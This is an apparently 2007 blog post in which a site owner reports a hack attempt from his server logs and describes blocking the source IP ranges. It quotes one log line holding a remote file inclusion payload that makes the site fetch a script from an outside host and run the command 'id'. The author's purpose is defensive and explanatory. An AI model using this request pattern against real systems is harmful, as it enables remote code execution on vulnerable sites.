The following hack attempt appeared in the dragonthoughts logs yesterday.

88.233.150.109 - - [21/May/2007:21:39:02 +0100] “GET /index.php?mosConfig_absolute_path=http://genchackers.net/tool20.dat?&list=1&cmd=id HTTP/1.0″ 403 283 “-” “Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)”

presumably it is a script kiddy, who has no idea how old the exploit is, but these reports of a year ago will provide an idea:

• http://osvdb.org/displayvuln.php?osvdb_id=27010
• http://xforce.iss.net/xforce/xfdb/27906

The listed abuse reporting email address bounced my complaint, for the originators IP range 88.233.0.0 - 88.233.255.255

netname: TurkTelekom
descr: TT ADSL-alcatel_gay

So, all of its IP ranges will have their access blocked.

As will the range 212.175.205.0- 212.175.205.255 which is hosting genchackers.net

The hacker script that is hosted at genchackers.net was ripped off from http://georgiaeliteallstars.com although they seem to have taken the script down now.

As it stands, the script can’t work for the kiddie that downloaded it, but I don’t think it is appropriate or ethical to explain how to fix it!